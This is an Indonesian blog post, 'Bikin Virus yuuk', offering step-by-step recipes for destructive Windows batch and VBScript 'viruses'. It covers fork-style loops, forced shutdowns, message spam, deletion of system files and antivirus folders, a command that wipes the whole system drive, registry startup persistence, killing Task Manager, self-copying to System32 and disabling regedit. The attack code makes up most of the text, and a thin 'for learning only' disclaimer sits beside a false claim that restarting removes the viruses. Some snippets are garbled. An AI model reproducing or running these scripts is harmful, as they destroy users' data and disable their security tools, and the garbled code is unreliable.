Bikin Virus yuuk
00.35 | Author: tekom_pusrehab
1. membuat komputer menjadi hang
@echo off
:top
start %regedit%
/system32/microsoft.exe/
goto top
save dengan nama "open.bat"

2. membuat komputer shutdown mengeluarkan pesan
@echo off
msg *km lagi ngapain?
shutdown -s -c "error, gmn nih?
save dengan nama "mati.bat"
khusus virus yg satu ini, ada pencegahannya. yaitu dengan menulis "shutdown/a" di cmd

3. terdapat file yang sangat banyak dalam suatu folder
@echo off
:begin
md %random%
goto begin
save dengan nama "file.bat"

4. membuat pesan yang muncul terus menerus dalam komputer
@echo off
:khusus
msg *wah kenapa nih?
msg *udah bawa ke bengkel aja
msg *hahahaha
goto khusus
save dengan nama "pesan.bat"

5. memaksa komputer memaksa membuka file terus menerus

@echo off
:top
start %systemroot%
/system32/notepad.exe/
goto top

save dengan nama "awas.bat"

6.membuat kuis dalam notepad
@echo off
title kuis hari ini
:menu
cls
echo jika komputer kamu kena virus apa yang akan kamu lakukan
pause
echo pilih yang mana:
echo 1. Matiin komputer
echo 2. hapus semua file
echo 3. mukul CPU
set input=nothing
set/p input=choice:
if %input%==1 shutdown -s -t 10
if %input%==2 del c:xxx
if %input%==3 @echo off
msg* yah milih ini deh
msg* udah install ulang aja
msg *biar masalah nya kelar
@echo off
:top
start %systemroot%
system32/notepad.exe/
goto top

save dengan nama "kuis.bat"
sebenarnya sangat banyak virus virus sederhana dari notepad, saya hanya menjelaskan tentang virus yang ber ekstensi ".bat"
INGAT!!! ini hanya untuk pembelajaran saja dan diharapkan tidak untuk kejahatan
jika anda tidak kuat iman lebih baik jangan melakukan hal hal tersebut
dan jika ingin menghilangkan virus nya tinggal di RESTART aja koq


MEMBUAT VIRUS RESTART
 
Masuk Notepad kemudian isi script di bawah ini :
@echo off
shutdown -r -f -t 00
Perintah ini hanya akan me-restart komputer Anda. Anda aman untuk mencobanya. Sama seperti script virus.bat, script di atas ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat


       MEMBUAT VIRUS DI NOTEPAD
Masuk Notepad kemudian masukkan script di bawah ini :
offcd\WINDOWS\@del explorer.exe@del
NOTEPAD.execd\WINDOWS\system32\@del winlogon.exe@del
spider.exe@del notepad.exe@del mspaint.exe@del accwiz.exe@del
Simpan script tersebut dalam bentuk file.vbs, misal : Virus.vbs


     MEMBUAT VIRUS UNTUK MEMATIKAN WINDOWS
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60, vbhide
Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs. Virus ini berfungsi untuk mematikan windows dalam waktu 60 sekon “shutdown -s-f -t 60". (60) Ganti waktu yang dinginkan. Misalnya 30 detik/sesuai keinginan.
s = Shutdown
r = Reboot/restart
kalau untuk restart ganti yang berwarna Merah dengan r. jadi
CreateObject(”WScript.Shell”).run “shutdown -r-f -t 60, vbhide
     
       MEMBUAT VIRUS YANG DAPAT MENGHAPUS FILE
Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” (menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” (menghapus folder antivirus di direktory C:\)
Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Kemudian simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs


       MENJALANKAN VIRUS PADA SAAT STARTUP ATAU SAAT WINDOWS DIHIDUPKAN
Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs” (menjalankan virus yang berada di direktory c:\windows\system32 dengan nama virus.vbs)
Simpan script tersebut dalam bentuk file.reg, misal : virusstartup.reg
            MEMBUAT VIRUS PEMBUNUH PROSES
Virus ini digunakan untuk membunuh proses (proses adalah program yang sedang berjalan) misalnya kita akan membunuh proses taskmanager. Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide
Simpan script tersebut dalam bentuk file.vbs, misal: virustaskkill.vbs
       MEMBUAT VIRUS YANG DAPAT MENGOPYKAN DIRI KE DEREKTORY LAIN
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject(”Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Simpan script tersebut dalam bentuk file.vbs, misal : virus.vbs
Ada juga cara lain dengan script seperti ini:
On Error Resume Nextcreateobject(”scripting.filesystemobject”).copyfile wscript.scriptfullname,createobject(”scripting.filesystemobject”).getspecialfolder(1) & “\virus.vbs”
Simpan script tersebut dalam bentuk file.vbs, misal : virus.vbs
.getspecialfolder(0) kode ini berfungsi untuk mengcopykan virus.vbs ke direktory Windows
.getspecialfolder(1) kode ini berfungsi untuk mengcopykan virus.vbs ke direktory System32
.getspecialfolder(2) kode ini berfungsi untuk mengcopykan virus.vbs ke direktory Temporary
8     MEMBUAT VIRUS BERBAHAYA
Ketik script berikut di notepad, dan simpan dengan ekstensi bat, misalnya virus.bat
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
   
             Men-Disable Regedit Menggunakan Virus
Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume NextCreateObject(”WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d “”1” /f”, vbhide
On Error Resume Next (perintah ini digunakan pada file vb supaya bila ada yang script yang salah bisa dilanjutkan ke kode berikutnya) Simpan script tersebut dalam bentuk file.vbs, misal : disableregedit.vbs
|
This entry was posted on 00.35 and is filed under . You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

1 comments:

On 25 April 2013 01.13 , putra afwgho mengatakan...

ok pak radid mantaaaaap.....selamat buat tekom...

 

Promo